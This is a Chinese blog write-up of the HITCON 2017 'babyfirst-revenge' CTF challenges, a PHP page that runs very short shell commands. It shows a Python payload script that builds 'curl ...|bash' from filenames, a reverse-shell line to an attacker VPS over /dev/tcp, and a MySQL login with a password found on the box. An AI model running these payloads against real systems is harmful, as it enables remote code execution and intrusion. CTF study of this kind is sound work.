HITCON2017 babyfirst-revenge 两题复现

之前做buuctf上面的题,碰到一个仿照但条件更宽松的题目,搜了一下原题来记录一下。
感谢Pr0ph3t师傅的dockerfile

1.babyfirst-revenge

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

在本题中,执行命令的长度被限制到了5个字符,而且执行命令使用的是exec,没有回显,因此得想办法写一个马或者反弹shell
一般来说,写文件最短的命令是
echo 1>x
但还有一种更巧妙的方式:

>a #产生了文件名为a的空文件
ls>_ # 将文件名a和_写入了文件_
sh _  #执行了a指令

这里用到了linux的一个Trick,文件中当前命令错误时会报错但不会影响后续命令的执行,所以_也被写进了_文件,但是不会影响命令的执行,以ls为例:

所以我们可以通过这种方式写入命令
此时又有另一个问题,ls的输出其实是自带换行符的:

这里又用到了linux的另一个Trick,命令执行可以通过\进行换行续写:

因此有这样一个思路,将所要执行的命令分解成片段并作为文件名,并在文件名末尾添加\,最后使用ls>x将其输出到文件x中,然后sh x
但是linux的ls默认是按照字典序进行排序的,难以保证我们的命令分段刚好能按照字典序排序,这里可以使用-t参数,会使排序按照修改时间进行排序,晚生成的文件排在前面

所以将命令分段倒序执行即可:

现在还有最后一个问题,我们最后要执行的ls -t>x显然是超长的,要将它分成几段使用ls写入文件的话,就不能使用-t了(不然还是超长,死循环),五个字符的限制,除去必须的\和>,还剩三个字符,而ls -t>x中的-和>字典序是非常靠前的,一定会在字母前面,这里有两种方法:

1.使用>>进行拼接

先将ls写入x,剩下的命令使用>>进行追加

2.按字典序分割

幸运的是ls -t>x这句命令可以分割为"l", "s -", "t>x",刚好是按照字典序排列的,直接生成即可

这样,只需要将我们要执行的命令分段写入执行即可
比如curl 2783117327|bash
以上数字为我vps地址的十进制形式,同时将ip/index.html内容替换为

bash -c "bash -i >& /dev/tcp/165.227.0.15/8123 0>&1"

在自己vps进行监听,反弹shell即可

注意,ash(就是命令的最后一个分段)后面不要加\,不然会将下一行也视为命令的一部分导致执行失败
以上部分都是在容器里直接执行的,在题目环境里,通过cmd提交命令即可,可以写个脚本方便一点,这里拿orange师傅的脚本稍微改了改:

import requests
from time import sleep
from urllib.parse import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 
    # generate `curl 2783117327|bash` 
    '>bash',
    '>7\|\\',
    '>732\\',
    '>311\\',
    '>278\\',
    '>l\ \\',
    '>cur\\', 

    # exec
    'sh _', 
    'sh g'
]

r = requests.get('http://localhost:10001/?reset=1')
for i in payload:
    # assert len(i) <= 5 
    r = requests.get('http://localhost:10001/?cmd=' + quote(i) )
    print(i)
    sleep(0.2)

成功反弹shell
在home目录下找到名为fl4444g的目录

得到提示,flag在数据库里
在shell中,不能直接使用mysql连接数据库进行交互,可以使用-e参数来执行SQL语句:
mysql -ufl4444g -pSugZXUtgeJ52_Bvr -e "show databases;" > database.txt
Pr0ph3t师傅的docker似乎没配置mysql,所以就做到这里了,接下来直接查询就可以得到flag了

2.babyfirst-revenge-v2

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

相比于上一题,cmd长度限制变成了4,其他没有变化
但是上一题用的ls>>_无法再用了,而且也没法分割成字典序可用的命令段
这里先说一下另外一个linux的Trick
*一般作为通配符使用,但单独一个*,linux会把当前目录下的所有文件名按照字典序排序,然后作为命令执行:

此外,从上图中可以看到,*o达到了同样的效果,在执行命令的前提下,*还可以作为通配符使用

在ls无法先添加到开始位置的情况下,可以使用rev将其逆序,即将g> t- sl逆序
但考虑到t的字典序比s大,会在s后面,可以再添加一个参数h,即g> ht- sl
参数h在没有参数l的情况下不会有效果,可以随意添加
但是,如果还是像上一题一样使用ls,是有换行符的,rev逆序是按行进行的,也就是只会对每一行内容分别逆序,无法达成目的
可以使用dir命令,与ls命令类似,不过输出中只有最后有一个换行符:

但是dir>_超长了,这里就可以使用我们上面提到的trick了:

*v执行了rev v命令,成功将ls -th >g写入了_文件,接下来就是v1的步骤了,只需要将每段命令更短一点即可。

打赏作者

“HITCON2017 babyfirst-revenge 两题复现”的2个回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注